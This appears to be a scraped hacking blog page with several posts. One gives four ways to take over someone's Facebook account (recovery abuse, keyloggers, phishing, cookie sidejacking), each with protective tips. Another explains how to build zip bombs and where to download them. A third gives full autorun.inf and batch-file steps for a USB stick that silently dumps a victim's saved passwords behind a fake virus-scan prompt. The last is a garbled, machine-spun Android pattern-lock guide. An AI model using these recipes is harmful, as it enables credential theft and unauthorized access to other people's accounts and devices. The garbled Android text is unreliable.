4 Ways to Crack a Facebook Password and How to Protect Yourself from Them

Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to break records numbers with over one billion monthly active users as of October 2012—and around 600 million active daily users.

We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. We even clamor to see the latest versions even before they're ready for primetime.

But we sometimes forget who's watching.

We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.

The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.

In fact, you don't even have to be a professional hacker to get into someone's Facebook account.

It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà—you're into the account. It's as easy as that.

In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1: Reset the Password

The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.

• The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
• Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
• It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
• It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
• It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
• If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.

• It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself

• Use an email address specifically for your Facebook and don't put that email address on your profile.
• When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
• Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2: Use a Keylogger

Software Keylogger

A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.

CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.

Hardware Keylogger

These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it's bit higher than buying the software since you have the buy the USB drive with the program already on it.

How to Protect Yourself

• Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
• Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
• Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
• Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type ofphishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.

The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

• Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
• Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
• Use anti-virus & web security software, like Norton or McAfee.

Method 4: Stealing Cookies

Cookies allow a website to store information on a user's hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don't actually get the login passwords, but they can still access the victim's account by cloning the cookies, tricking Facebook into thinking the hacker's browser is already authenticated.

Image via wikimedia.org

Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.

From there, the hacker can click on the saved cookies and access the victim's account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.

How to Protect Yourself

• On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
• Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
• Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
• Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
• Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.

Protecting Yourself: Less Is More

Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.

Facebook isn't something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.

If your Facebook account ever gets hacked, check out our guide on getting your hacked Facebook account back for information on restoring your account.

By: Unknown On 09:39

Continue Reading

Zip Bomb

A zip bomb, also known as a decompression bomb (or the 'Zip of Death' for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software, in order to create an opening for more traditional viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory.

The classic zip bomb is a tiny zip file, most are measuered in kilobytes. However, when this file is unzipped its contents are more than what the system can handle (usually up to Petabyte, i.e 1000 Terabyte. Some go up to exabytes too). Yes, we're talking about stuffing exabytes of data into kilobytes. In my view, this ingenious little trick is the product of "pure hacker mentality". In essence, it's nothing like phishing or sessio hijacking or anything else that has put a bad name to "hackers". It's a simple creative solution, an exploited loophole which truly shows: "Where there's a will, there's a way". To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR etc.)

Various compression software and tools make use of what's called "Lossless compression algorithms". As the name suggests, these algorithms strive to compress files without any loss of information. Clearly, when we compress a file we'd definitely want to get it back in the same shape after decompressing. These algorithms usually exploit statistical redundancy in such a way as to represent the sender's data more concisely without error. In English now: We know that the computer only understands 0's and 1's, So every single program or any data stored in your computer is actually just a series of 1's and 0's (Binary form). Let's take an example that's not entirely correct but will help you understand the principle. Say, we've got a file which after being converted to binary launguage looks like "1110000101". Remember statistical redundancy that was mentioned earlier? Try to spot it in this string (1110000101). Statistical redundancy basically means that the same thing is repeated over and over again. In this string we see that there are three 1's followed by four 0's. Now take a look at this string: "3140101". What just happened here is compression. We can simply write a program that codes and decodes files as above (Softwares like WinZip use a fancy form and overly complicated form of what we did above). If the program finds repeating patterns, like a lot of 1's together, it may simply replace all those 1's by another number. Another example, we find "111111111" somewhere in a program. That's nine 1's in a row. What if we replace it by "91"? We can simply code our program to replace a "91" by writing "1" nine times, effectively reversing the process. Again, while decoding, if the program encounters any number other than 1 or 0, in our case 9, it can be instructed to write the successive number, in our case 1, 9 times. So "91" gets converted back to "111111111". That's lossless compression.

What about the previous string (3140101)? On uncompressing this, we get back 1110000101, that is, the original string. Like I said, this example is not entirely accurate. Note that the computer only understands binary. Everything that you'll ever do on a computer will have, at some point, been converted to binary form. Actually the computer is forced to convert to something other than binary (like english) only for us, dumb humans. We compressed "111111111" by writing "91". But the "9" in the "91" will also have to again be converted into 1's and 0's. So our program is quite buggy. Widely used programs like WinZip, WinRar, PowerISO etc. use various different algorithms for different cases.

Lossless compression is possible because most real-world data has statistical redundancy. Lossless compression schemes are reversible so that the original data can be reconstructed.
However, lossless data compression algorithms will always fail to compress some files. Indeed, any compression algorithm will necessarily fail to compress any data containing no discernible patterns. Attempts to compress data that has been compressed already may actually result in an expansion, as will attempts to compress all but the most trivially encrypted data. This is why if you've ever tried "ZIPing" or "RARing" a file, you would have noticed in some cases it works great while in other cases it may not even reduce the file size by 5%. (WinRAR and WinZIP can be considered the same for (almost) all practical purposes. Their names differ more than their compression abilities. Feel free to use either.)

Now, back to zip bombs. Before taking a deeper look, let's get the basic meaning cleared up. Take a new text file and write '0' a 1000 times. Save it, the file size should be just around 1 kilobyte. Open it up, CTRL+A, CTRL+C,CTRL+V - i.e, copy the whole thing then paste it. Do this ten times. Our file is now around 10kb, and completely made of 0's. Do this a few more times. Faster than your expectations, the file size will quickly climb into megabytes and then gigabytes. In most cases, the notepad (or any text editor) will actually begin to lag since it has a ridiculous amount of 0's open in the window. When that happens, that's your cue to slow down since different operating systems and softwares can have unexpected behavious when dealing with such large files. Practically, just keep it under a few gigabytes and you should be fine.
(Even this may be too much for some systems, I recommend pausing at about a 100 Mb and then slowly increasing the size. If the lag lasts longer than around 15 seconds, you've reached the limit.) So, we have a 5Gb text file (on an awesome computer) containing nothing but 0's. A little perspective: That's over five-freaking-billion zeros that the innocent little notepad obediently handled in a few seconds. So the next time you're getting annoyed at your browser lagging a little bit, try taking a notebook and write down 5Gb worth of text. It's only fair.

And we're back. What do we do now with that ridiculously large text file? Compress it and watch your seriously underappreciated computer do magic. In the same directory, you'll now see the pointlessly large text file, and alongside it, a zip file that should be under 1 Megabyte. That's like stuffing 5000 balls into the volume of one.

Now, for a deeper look let's check out the most famous zip bomb, the 42.zip file. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level - effectively converting their exponential growth to linear.

(Here's a small website dedicated solely to the 42.zip, http://www.unforgettable.dk/ . You can ven download a ready-made zip bomb from here. Password for the zip file is '42'. The file has a password to protect users who have ancient antivirus software that is set to automatically scan all downloads)

Now, to avoid giving the wrong impression a myth needs to be busted. "Zip Bomb" is not a very accurate name for this malicious file. If you extract a zip-bomb, it won't do anything to your computer though, it'll just create 16 smaller zip-bombs. If you decompress one of those it'll yield 16 more zip-bombs. As such, they're not going to "explode" when someone opens them, they're just used by malware authors to knock out anti-virus software so malware can work without needing to watch its back. What happens is, a malicious program may plant a zip bomb somewhere near it as bait for AV software. The program will wait until the anti-virus comes up for a routine scan, and it'll wait, "hiding" behind the zip-bomb. When the anti-virus reaches the bomb, it'll try to open it, all in its limited memory. 1 file becomes 16, which becomes 256, and it goes on until the memory is full. In reality though, the computer never runs out of memory because each process is only allowed to use so much memory, after it hits its limit it crashes itself to protect the rest of the computer from an OOM (Out-Of-Memory) event. When this happens to an anti-virus program as it's trying to dig into the file for malware, the software simply crashes and exits, while leaving the rest of the computer unharmed. The malware will detect this, and will then use that opportunity to do whatever it wants, without having to worry about AV software that might be right around the corner. Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large", because until the last level the total amount of data is not "that much", you don't "see" how large the files at the lowest level are until you have reached that level, by which time it is, of course, too late). However, most anti-virus software today recognizes a zip-bomb when it sees one, and will skip over it, alerting the user that the computer might be infected with malware. They usually go down to the second or third level before flagging the file.

Further, You wouldn't notice disk space being used because zip-bombs only decompress in an anti-virus program's memory, not to the disk. Most manual archive-opening programs don't even have a recursive opening mode for this very reason. Plus you also wouldn't notice much extra work by the CPU, because zip-bombs work so fast they can knock out an inadequately protected anti-virus program in seconds, while only using a fraction of the total computer's memory.

The 42.zip is just one example, there are many more like this and you can create your own. A similar file is an XML-based decompression bomb called "billion laughs" (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory (Again, most browsers today will detect such recursive expansion and simply not try to parse the booby-trapped XML).

There's even a torrent for one of the largest (and smallest) zip bombs on the internet although it seems all the seeders have long gone. It's a 5.61 kilobyte zip file that expands to 4 Zettabytes. It seems to be at the absolute limit of zip bombs. Here's the KickAss Torrent link:http://kickass.to/zip-bomb-insanely-huge-zip-archive-4zb-t2105770.html (As a challenge, you can try replicating it. The file structure has been explained in the link: 8 layers, 32 archives in each layer, each archive containing a 4Gb file)

Let's walk through the process once again. Make a 4 Gb text file full of 0's. Zip it. Let's call it zip1. Create, say 10 copies of this zip file. We have 10 zip1's. Now, zip all ten zip1's again. Call it zip2. We're at the second level now and we can simply continue the process for as long as we like and the zip file will just keep getting bigger and bigger. A common doubt is, How can we create a zip file that opens up to a 4 Zettabyte size without having 4 Zettabyte memory on our computers? Actually, we don't even need 10 Gb for this. We just took a 4Gb text file and zipped it (into zip1). We can simply delete the original text file as it is no longer required. All we need is the first single tiny zip file and it is of this zip file that we create more copies, zip them up, create more copies and zip again and so on.

And that ends the story of the zip bomb. These actually come under the class of logic bombs, which also contains the fork bomb we made using batch files. Yet again, the name DDOS is going to pop up here. Zip bombs are basically DDOSers for antiviruses. Limited memory is a 'flaw' that has remained in all computers since their inception and hackers always find a way to exploit it. When the old methods stop working, new ones soon pop up and take their place. DDOSing, Zip Bombs, Fork Bombs, XML bombs, PDF bombs, buffer overflows and what not. This shows what a crucial part of programming 'memory management' really is. And so, we live another day, ready to combat the next problem.

By: Unknown On 09:15

Continue Reading

USB Password Stealer

Because looking like an expert is easier than being one.

There's a lot of people in the world and even more online accounts. Every security system has a flaw and what we're going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to "recover" saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What's quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to "Show Saved Paswords" in the options menu. We're going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you'll learn in this tutorial. So, with a goal in mind and not a second to spare, let's start right away. 

Things you will need (See link below):- 

MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications. 

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc 

IE Passview - IE passview is another small program that helps us view stored passwords in Internet explorer. 

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. 

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I've tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/) 

So that's that and now we are ready to create a USB password stealer. 
Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course ;-) 

1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any]) 

2. Create a new Notepad and write the following text into it: 



[autorun] 
open=launch.bat 
ACTION= Perform a Virus Scan 

Save the Notepad and rename it from New Text Document.txt to autorun.inf 
Now copy the autorun.inf file onto your USB pendrive. 

3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.) 
start mspass.exe /stext mspass.txt 
start mailpv.exe /stext mailpv.txt 
start iepv.exe /stext iepv.txt 
start pspv.exe /stext pspv.txt 
start passwordfox.exe /stext passwordfox.txt 

Save the Notepad and rename it from New Text Document.txt to launch.bat 
Copy the launch.bat file also to your USB drive. 

These were simple commands to start up our password "recovering" programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files. 

Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it's magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work. 
See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious. 
This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.

By: Unknown On 22:29

Continue Reading

How to Bypass Pattern Lock on Android

How to Bypass Pattern Lock on android : these days during this post i planning to discuss concerning the way to Bypass Pattern Lock on android, pin or positive identification lock. In lately android is most used package and everybody use android phones. android package is provided by Google. android phones is incredibly well-liked in lately. several peoples use differing types of applications in android phone. Some peoples uses android lock pattern and lots of peoples typically forget their lock pattern.

Note : This post is Education Purpost solely, don’t use any illigal activity. Suddenly if you forget your android lock pattern, therefore don’t worry, I even have terribly easy technique to unlock or reset the android lock pattern.
Android could be a terribly fascinating and really interface and it's become very hip among mobile and widget users been the package use currently. the matter users face now could be the way to disable or unlock android phone positive identification or pattern lock that has become common currently.
When you enter wrong secret quite five times then it'll provide you with warning and you are attempting once thirty seconds. however when you forget secret then you reset lock. currently click forget secret, then enter gmail id and secret (you entered in Google play store). At this time you would like to reset or unlock your android lock. however if you don’t apprehend email id and secret then follow below easy steps to reset or unlock you humanoid phone. however once use this technique, you lose all data in your phone memory.

No one is prefect therefore you meant have forgotten your android positive identification or maybe pattern you used for the pattern lock, during this post, i will be able to discuss concerning the way to Bypass Pattern Lock on android that's already lock simply with some few simple tips, all you simply got to do is to follow directions,

How to Bypass Pattern Lock on android Education Purpose Only:
To get your pattern lock or positive identification of your android device unbarred please follow the directions well and am certain you'll get what you're planning to get your device unbarred while not drawback.
1 ) initial of all, you wish to modify off your android device and keep it for a few time.

2 ) when switch of your android device, press your up ↑ volume button and Press It down.
3 ) currently press the ability button and hold it too in conjunction with the degree up button.
4 ) it'll begin a secret terminal interface.
5 ) Then press to use home button for scroll volume up and down.
6 ) Then you'll get to the select choice Delete All User information.
7 ) currently during this means, your android lock pattern is unbarred currently drawback is resolved.

Your device can take a while however when it'll restart and you'll resolve your android device has been unbarred.

How to Bypass Pattern Lock on android : If you face any drawback relating to this post, please tell me in below comments